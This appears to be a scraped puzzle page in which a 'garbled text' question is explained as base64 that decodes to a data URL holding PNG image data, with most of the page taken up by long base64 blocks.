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
+
Question Explanation: Find the answer from this garbled text.
Solution:
Actually, this question is quite straightforward, no need to overthink; frequent users of encoding should recognize that this garbled text is just a base64 string. Let’s decode it to get:
1
+
data:image/png;base64,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